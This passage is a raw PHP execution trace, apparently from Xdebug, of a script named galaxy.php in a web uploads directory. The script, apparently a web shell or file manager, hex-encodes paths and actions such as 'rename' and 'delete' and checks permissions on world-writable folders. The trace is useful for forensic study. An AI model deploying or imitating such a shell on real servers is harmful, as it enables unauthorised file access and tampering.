3	642	0	0.023147	482272	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	642	1	0.023159	482344
3	642	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	643	0	0.023188	482280	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	643	1	0.023199	482320
3	643	R			108
3	644	0	0.023211	482280	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	644	1	0.023222	482352
3	644	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	645	0	0.023250	482280	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	645	1	0.023262	482320
3	645	R			47
3	646	0	0.023274	482280	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	646	1	0.023285	482352
3	646	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	647	0	0.023314	482280	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	647	1	0.023325	482320
3	647	R			117
3	648	0	0.023337	482280	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	648	1	0.023348	482352
3	648	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	649	0	0.023381	482280	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	649	1	0.023393	482320
3	649	R			112
3	650	0	0.023405	482280	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	650	1	0.023416	482352
3	650	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	651	0	0.023444	482288	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	651	1	0.023456	482328
3	651	R			108
3	652	0	0.023467	482288	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	652	1	0.023478	482360
3	652	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	653	0	0.023507	482288	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	653	1	0.023518	482328
3	653	R			111
3	654	0	0.023530	482288	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	654	1	0.023541	482360
3	654	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	655	0	0.023569	482288	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	655	1	0.023580	482328
3	655	R			97
3	656	0	0.023592	482288	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	656	1	0.023603	482360
3	656	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	657	0	0.023633	482288	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	657	1	0.023644	482328
3	657	R			100
3	658	0	0.023656	482288	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	658	1	0.023667	482360
3	658	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	659	0	0.023695	482304	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	659	1	0.023707	482344
3	659	R			115
3	660	0	0.023719	482304	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	660	1	0.023730	482376
3	660	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	661	0	0.023759	482304	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	661	1	0.023770	482344
3	661	R			47
3	662	0	0.023782	482304	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	662	1	0.023793	482376
3	662	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	663	0	0.023822	482304	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	663	1	0.023834	482344
3	663	R			100
3	664	0	0.023845	482304	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	664	1	0.023856	482376
3	664	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	665	0	0.023885	482304	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	665	1	0.023896	482344
3	665	R			97
3	666	0	0.023908	482304	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	666	1	0.023919	482376
3	666	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	667	0	0.023948	482304	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	667	1	0.023959	482344
3	667	R			116
3	668	0	0.023971	482304	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	668	1	0.023982	482376
3	668	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	669	0	0.024011	482304	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	669	1	0.024022	482344
3	669	R			97
3	670	0	0.024034	482304	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	670	1	0.024045	482376
3	670	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	618	1	0.024078	482304
2	618	R			'2f7661722f7777772f68746d6c2f75706c6f6164732f64617461'
2	671	0	0.024096	482416	filemtime	0		/var/www/html/uploads/galaxy.php	110	1	'/var/www/html/uploads/data'
2	671	1	0.024109	482456
2	671	R			1676246275
2	672	0	0.024122	482360	date	0		/var/www/html/uploads/galaxy.php	110	2	'Y-m-d H:i'	1676246275
2	672	1	0.024192	484752
2	672	R			'2023-02-12 18:57'
2	673	0	0.024212	484608	is_writable	0		/var/www/html/uploads/galaxy.php	110	1	'/var/www/html/uploads/data'
2	673	1	0.024232	484648
2	673	R			TRUE
2	674	0	0.024247	484608	perms	1		/var/www/html/uploads/galaxy.php	110	1	'/var/www/html/uploads/data'
3	675	0	0.024260	484608	fileperms	0		/var/www/html/uploads/galaxy.php	29	1	'/var/www/html/uploads/data'
3	675	1	0.024273	484648
3	675	R			16895
2		A						/var/www/html/uploads/galaxy.php	29	$p = 16895
2		A						/var/www/html/uploads/galaxy.php	34	$i = 'd'
2		A						/var/www/html/uploads/galaxy.php	39	$i .= 'r'
2		A						/var/www/html/uploads/galaxy.php	40	$i .= 'w'
2		A						/var/www/html/uploads/galaxy.php	41	$i .= 'x'
2		A						/var/www/html/uploads/galaxy.php	42	$i .= 'r'
2		A						/var/www/html/uploads/galaxy.php	43	$i .= 'w'
2		A						/var/www/html/uploads/galaxy.php	44	$i .= 'x'
2		A						/var/www/html/uploads/galaxy.php	45	$i .= 'r'
2		A						/var/www/html/uploads/galaxy.php	46	$i .= 'w'
2		A						/var/www/html/uploads/galaxy.php	47	$i .= 'x'
2	674	1	0.024388	484648
2	674	R			'drwxrwxrwx'
2	676	0	0.024402	484552	hex	1		/var/www/html/uploads/galaxy.php	110	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	677	0	0.024433	484552	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	677	1	0.024445	484592
3	677	R			47
3	678	0	0.024458	484552	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	678	1	0.024469	484624
3	678	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	679	0	0.024500	484584	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	679	1	0.024511	484624
3	679	R			118
3	680	0	0.024524	484584	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	680	1	0.024535	484656
3	680	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	681	0	0.024565	484584	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	681	1	0.024577	484624
3	681	R			97
3	682	0	0.024589	484584	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	682	1	0.024600	484656
3	682	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	683	0	0.024630	484584	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	683	1	0.024641	484624
3	683	R			114
3	684	0	0.024653	484584	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	684	1	0.024665	484656
3	684	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	685	0	0.024694	484592	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	685	1	0.024706	484632
3	685	R			47
3	686	0	0.024718	484592	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	686	1	0.024729	484664
3	686	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	687	0	0.024759	484592	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	687	1	0.024771	484632
3	687	R			119
3	688	0	0.024783	484592	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	688	1	0.024795	484664
3	688	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	689	0	0.024824	484592	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	689	1	0.024835	484632
3	689	R			119
3	690	0	0.024888	484592	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	690	1	0.024908	484664
3	690	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	691	0	0.024939	484592	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	691	1	0.024951	484632
3	691	R			119
3	692	0	0.024963	484592	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	692	1	0.024975	484664
3	692	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	693	0	0.025003	484600	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	693	1	0.025015	484640
3	693	R			47
3	694	0	0.025027	484600	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	694	1	0.025038	484672
3	694	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	695	0	0.025067	484600	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	695	1	0.025079	484640
3	695	R			104
3	696	0	0.025091	484600	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	696	1	0.025102	484672
3	696	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	697	0	0.025131	484600	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	697	1	0.025143	484640
3	697	R			116
3	698	0	0.025155	484600	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	698	1	0.025166	484672
3	698	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	699	0	0.025195	484600	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	699	1	0.025206	484640
3	699	R			109
3	700	0	0.025218	484600	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	700	1	0.025230	484672
3	700	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	701	0	0.025259	484608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	701	1	0.025270	484648
3	701	R			108
3	702	0	0.025282	484608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	702	1	0.025294	484680
3	702	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	703	0	0.025323	484608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	703	1	0.025334	484648
3	703	R			47
3	704	0	0.025346	484608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	704	1	0.025357	484680
3	704	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	705	0	0.025386	484608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	705	1	0.025397	484648
3	705	R			117
3	706	0	0.025409	484608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	706	1	0.025420	484680
3	706	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	707	0	0.025449	484608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	707	1	0.025461	484648
3	707	R			112
3	708	0	0.025472	484608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	708	1	0.025483	484680
3	708	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	709	0	0.025512	484616	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	709	1	0.025523	484656
3	709	R			108
3	710	0	0.025535	484616	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	710	1	0.025547	484688
3	710	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	711	0	0.025575	484616	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	711	1	0.025587	484656
3	711	R			111
3	712	0	0.025599	484616	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	712	1	0.025614	484688
3	712	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	713	0	0.025643	484616	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	713	1	0.025654	484656
3	713	R			97
3	714	0	0.025666	484616	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	714	1	0.025677	484688
3	714	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	715	0	0.025706	484616	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	715	1	0.025717	484656
3	715	R			100
3	716	0	0.025729	484616	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	716	1	0.025741	484688
3	716	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	717	0	0.025769	484632	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	717	1	0.025781	484672
3	717	R			115
3	718	0	0.025793	484632	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	718	1	0.025804	484704
3	718	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	676	1	0.025833	484632
2	676	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	719	0	0.025849	484616	hex	1		/var/www/html/uploads/galaxy.php	110	1	'rename'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	720	0	0.025880	484616	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	720	1	0.025891	484656
3	720	R			114
3	721	0	0.025903	484616	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	721	1	0.025914	484688
3	721	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	722	0	0.025943	484648	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	722	1	0.025955	484688
3	722	R			101
3	723	0	0.025967	484648	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	723	1	0.025978	484720
3	723	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	724	0	0.026007	484648	ord	0		/var/www/html/uploads/galaxy.php	18	1	'n'
3	724	1	0.026019	484688
3	724	R			110
3	725	0	0.026031	484648	dechex	0		/var/www/html/uploads/galaxy.php	18	1	110
3	725	1	0.026042	484720
3	725	R			'6e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	726	0	0.026072	484648	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	726	1	0.026083	484688
3	726	R			97
3	727	0	0.026094	484648	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	727	1	0.026106	484720
3	727	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	728	0	0.026135	484656	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	728	1	0.026146	484696
3	728	R			109
3	729	0	0.026158	484656	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	729	1	0.026170	484728
3	729	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	730	0	0.026199	484656	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	730	1	0.026210	484696
3	730	R			101
3	731	0	0.026222	484656	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	731	1	0.026233	484728
3	731	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	719	1	0.026262	484656
2	719	R			'72656e616d65'
2	732	0	0.026276	484616	hex	1		/var/www/html/uploads/galaxy.php	110	1	'data'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	733	0	0.026307	484616	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	733	1	0.026322	484656
3	733	R			100
3	734	0	0.026334	484616	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	734	1	0.026346	484688
3	734	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	735	0	0.026375	484648	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	735	1	0.026387	484688
3	735	R			97
3	736	0	0.026399	484648	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	736	1	0.026411	484720
3	736	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	737	0	0.026440	484648	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	737	1	0.026451	484688
3	737	R			116
3	738	0	0.026463	484648	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	738	1	0.026475	484720
3	738	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	739	0	0.026504	484648	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	739	1	0.026515	484688
3	739	R			97
3	740	0	0.026527	484648	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	740	1	0.026538	484720
3	740	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	732	1	0.026567	484656
2	732	R			'64617461'
2	741	0	0.026582	484744	hex	1		/var/www/html/uploads/galaxy.php	110	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	742	0	0.026612	484744	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	742	1	0.026623	484784
3	742	R			47
3	743	0	0.026635	484744	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	743	1	0.026647	484816
3	743	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	744	0	0.026676	484776	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	744	1	0.026688	484816
3	744	R			118
3	745	0	0.026700	484776	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	745	1	0.026711	484848
3	745	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	746	0	0.026741	484776	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	746	1	0.026753	484816
3	746	R			97
3	747	0	0.026765	484776	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	747	1	0.026776	484848
3	747	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	748	0	0.026814	484776	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	748	1	0.026826	484816
3	748	R			114
3	749	0	0.026838	484776	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	749	1	0.026849	484848
3	749	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	750	0	0.026879	484784	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	750	1	0.026890	484824
3	750	R			47
3	751	0	0.026903	484784	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	751	1	0.026915	484856
3	751	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	752	0	0.026944	484784	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	752	1	0.026955	484824
3	752	R			119
3	753	0	0.026968	484784	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	753	1	0.026979	484856
3	753	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	754	0	0.027009	484784	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	754	1	0.027021	484824
3	754	R			119
3	755	0	0.027033	484784	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	755	1	0.027044	484856
3	755	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	756	0	0.027079	484784	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	756	1	0.027091	484824
3	756	R			119
3	757	0	0.027103	484784	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	757	1	0.027114	484856
3	757	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	758	0	0.027143	484792	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	758	1	0.027154	484832
3	758	R			47
3	759	0	0.027166	484792	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	759	1	0.027178	484864
3	759	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	760	0	0.027207	484792	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	760	1	0.027218	484832
3	760	R			104
3	761	0	0.027230	484792	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	761	1	0.027241	484864
3	761	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	762	0	0.027269	484792	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	762	1	0.027281	484832
3	762	R			116
3	763	0	0.027292	484792	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	763	1	0.027304	484864
3	763	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	764	0	0.027333	484792	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	764	1	0.027344	484832
3	764	R			109
3	765	0	0.027356	484792	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	765	1	0.027368	484864
3	765	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	766	0	0.027397	484800	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	766	1	0.027408	484840
3	766	R			108
3	767	0	0.027421	484800	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	767	1	0.027432	484872
3	767	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	768	0	0.027461	484800	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	768	1	0.027473	484840
3	768	R			47
3	769	0	0.027485	484800	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	769	1	0.027496	484872
3	769	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	770	0	0.027526	484800	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	770	1	0.027537	484840
3	770	R			117
3	771	0	0.027549	484800	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	771	1	0.027561	484872
3	771	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	772	0	0.027590	484800	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	772	1	0.027601	484840
3	772	R			112
3	773	0	0.027614	484800	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	773	1	0.027625	484872
3	773	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	774	0	0.027654	484808	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	774	1	0.027665	484848
3	774	R			108
3	775	0	0.027678	484808	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	775	1	0.027690	484880
3	775	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	776	0	0.027720	484808	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	776	1	0.027731	484848
3	776	R			111
3	777	0	0.027743	484808	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	777	1	0.027754	484880
3	777	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	778	0	0.027789	484808	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	778	1	0.027801	484848
3	778	R			97
3	779	0	0.027813	484808	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	779	1	0.027825	484880
3	779	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	780	0	0.027855	484808	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	780	1	0.027867	484848
3	780	R			100
3	781	0	0.027880	484808	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	781	1	0.027891	484880
3	781	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	782	0	0.027922	484824	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	782	1	0.027933	484864
3	782	R			115
3	783	0	0.027945	484824	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	783	1	0.027957	484896
3	783	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	741	1	0.027987	484824
2	741	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	784	0	0.028003	484872	hex	1		/var/www/html/uploads/galaxy.php	110	1	'delete'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	785	0	0.028035	484872	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	785	1	0.028047	484912
3	785	R			100
3	786	0	0.028059	484872	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	786	1	0.028071	484944
3	786	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	787	0	0.028101	484904	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	787	1	0.028113	484944
3	787	R			101
3	788	0	0.028125	484904	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	788	1	0.028137	484976
3	788	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
